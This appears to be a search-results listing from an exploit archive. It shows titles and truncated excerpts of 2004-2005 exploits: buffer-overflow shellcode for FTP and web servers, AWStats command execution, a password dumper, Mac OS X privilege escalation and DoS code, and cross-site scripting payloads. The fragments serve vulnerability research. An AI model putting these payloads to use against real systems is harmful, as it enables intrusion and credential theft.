2058 matches found
Savant Web Server 3.1 - Remote Buffer Overflow (1)
Savant web server Buffer Overflow Exploit Discovered by : Mati Aharoni Coded by : Tal Zeltzer and Mati Aharoni www.see-security.com FOR RESEACRH PURPOSES ONLY! import struct import socket sc = "\x90" 21 win32adduser - PASS=pwd EXITFUNC=thread USER=X Size=232 Encoder=PexFnstenvSub...
JShop E-Commerce Suite 1.2 Product.PHP Cross-Site Scripting Vulnerability
JShop E-Commerce Suite 1.2 Product.PHP Cross-Site Scripting Vulnerability. Webapps exploit for php platform source: http://www.securityfocus.com/bid/12403/info JShop E-Commerce Suite is affected by a cross-site scripting vulnerability in the 'product.php' script. As a result of this vulnerability...
WarFTPD 1.82 RC9 DoS
Hello, due to an access violation, specialy crafted CWD-Commands will exit the FTP server when running as a NT service. User needs to be logged on. Vendor's report can be found at http://support.jgaa.com/index.php?cmd=ShowReport&ID=02643 Solution: deny anonymous or untrusted logins or use patched...
windows 9x/NT/2k/XP PEB method 31 bytes
Exploit for win32 platform in category shellcode ======================================= Windows 9x/NT/2k/XP PEB method 31 bytes ======================================= / 004045F4 6A 30 PUSH 30 004045F6 59 POP ECX 004045F7 64:8B09 MOV ECX,DWORD PTR FS:ECX 004045FA 85C9 TEST ECX,ECX 004045FC 78 0C...
Windows 9x/NT/2k/XP PEB method 31 bytes
Windows 9x/NT/2k/XP PEB method 31 bytes. Shellcode exploit for win32 platform / 004045F4 6A 30 PUSH 30 004045F6 59 POP ECX 004045F7 64:8B09 MOV ECX,DWORD PTR FS:ECX 004045FA 85C9 TEST ECX,ECX 004045FC 78 0C JS SHORT OllyTest.0040460A 004045FE 8B49 0C MOV ECX,DWORD PTR DS:ECX+C 00404601 8B71 1C MO...
AWStats configdir Remote Command Execution Exploit (perl code)
No description provided by source. !/usr/bin/perl ---GHC--------------------------------- Remote command execution exploit Product: Advanced Web Statistics 6.0 - 6.2 URL:http://awstats.sourceforge.net Greets & respects to our friends: 1dt.w0lf and all rst.void.ru Special greets 2 d0G4 & cr0n for...
Siteman 1.1.10 - Remote Administrative Account Addition
!/usr/bin/perl -w Exploit by Noam Rathaus - Beyond Security Ltd. Exploit for the SiteMan vulnerability discovered by: "amironline452" use Digest::MD5 qwmd5 md5hex md5base64; use IO::Socket; use strict; ./siteman.pl / vulnerable.host my $Path = shift; my $Host = shift; my $Username = shift; my...
Funduc Search and Replace Compressed File Local BoF Exploit
No description provided by source. / Search and Replace Compressed File search Local Buffer Overflow Exploit Discoveried & Coded By ATmaCA Copyright ©2002-2005 AtmacaSoft Inc. All Rights Reserved. Web: http://www.atmacasoft.com E-Mail: [email protected] Greetings to: Tarako / / Search and Replac...
Golden FTP Server 2.02b - Remote Buffer Overflow
!/usr/bin/perl -w Barabas - www.whitehat.co.il - cheers to muts and all peeps at WH. XPSP2 goldenftpserver sploit - bind 4444 use strict; use Net::FTP; my $payload="\x41"x260; $payload .="\x65\x82\xa5\x7c";jmpesp $payload .="\x90"x32;not really necessary...blah win32bind - EXITFUNC=seh LPORT=4444...
Mac OS X <= 10.3.7 mRouter Local Privilege Escalation Exploit
Exploit for macOS platform in category local exploits ============================================================= Mac OS X include include define VULNPROG "/System/Library/SyncServices/SymbianConduit.bundle/Contents/Resources/ mRouter" define MAXBUFSIZE 4096 char shellcode = // Shellcode by...
Apple Mac OSX 10.3.7 - Input Validation Flaw 'parse_machfile()' Denial of Service
/ DoS for Darwin Kernel Version int main int ac, char av FILE me; int rpl = 0xffffffff; fpost pos = 0x10; printf "- nacho - 2004 DoS for OSX darwin 7.5.0 -\n" ; printf "- nemo pulltheplug org -\n\n" ; printf "+ Opening file for writing.\n" ; if ! me = fopen av, "r+" printf "- Error opening exe.\n...
Mac OS X <= 10.3.7 Input Validation Flaw parse_machfile() DoS
No description provided by source. / DoS for Darwin Kernel Version 7.5.0 -nemo pulltheplug org- 2005 greetz to awnex, cryp, nt, andrewg, arc, mercy, amnesia ; irc.pulltheplug.org social / include stdio.h int main int ac, char av FILE me; int rpl = 0xffffffff; fpost pos = 0x10; printf "- nacho -...
Apple Mac OSX 10.3.7 - Input Validation Flaw parse_machfile() Denial of Service
Apple Mac OSX 10.3.7 - Input Validation Flaw parsemachfile Denial of Service / DoS for Darwin Kernel Version int main int ac, char av FILE me; int rpl = 0xffffffff; fpost pos = 0x10; printf "- nacho - 2004 DoS for OSX darwin 7.5.0 -\n" ; printf "- nemo pulltheplug org -\n\n" ; printf "+ Opening...
[EXPL] ITA Forum SQL Injection
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com - - promotion The SecuriTeam alerts list - Free, Accurate, Independent. Get your security news from a reliable source...
Peer2Mail <= 1.4 Encrypted Password Dumper Exploit
No description provided by source. / Peer2Mail Encrypt PassDumper Exploit v1.0 Discoveried & Coded By ATmaCA Copyright ©2002-2005 AtmacaSoft Inc. All Rights Reserved. Web: http://www.atmacasoft.com E-Mail: [email protected] / / Peer2Mail 1.4 and prior versions are affected. Tested for gmail...
exim.pl.txt
This proof-of-concept demonstrates the existence of the vulnerability reported by iDEFENSE iDEFENSE Security Advisory 01.14.05. In this report it was explained that a sequence like the one below did overflowed some internal buffer: /usr/bin/exim -bh ::%Aperl -e 'print pack'L',0xdeadbeef x 256' It...
Apple iTunes - Playlist Buffer Overflow Download Shellcode
/ Apple iTunes Playlist Buffer Overflow Download Shellcoded Exploit Bug discoveried by iDEFENSE Security http://www.idefense.com Exploit coded By ATmaCA Copyright ©2002-2005 AtmacaSoft Inc. All Rights Reserved. Web: http://www.atmacasoft.com E-Mail: [email protected] Credit to xT and delikon...
forumKIT.txt
Vulnerable System : forumKIT 1.0 Description : an XSS is founded in the variable members that have the value 'true' you can exchange it with XSS Code . exploit : http://forum.target.com/f.aspx?members="alertdocument.cookie; this exploit is discovered by : neO e-mail : [email protected]...
Exim 4.41 - 'dns_build_reverse' Local Buffer Overflow
/ This proof-of-concept demonstrates the existence of the vulnerability reported by iDEFENSE iDEFENSE Security Advisory 01.14.05. It has been tested against exim-4.41 under Debian GNU/Linux. Note that setuid is not included in the shellcode to avoid script-kidding. My RET is 0xbffffae4, but fb.pl...
Gore <= 1.50 Socket Unreacheable Denial of Service Exploit
No description provided by source. / by Luigi Auriemma / include stdio.h include stdlib.h include string.h ifdef WIN32 include winsock.h / winerr.h + amp2zero.c / [email protected] / / Header file used for manage errors in Windows It support socket and errno too this header replace the previous...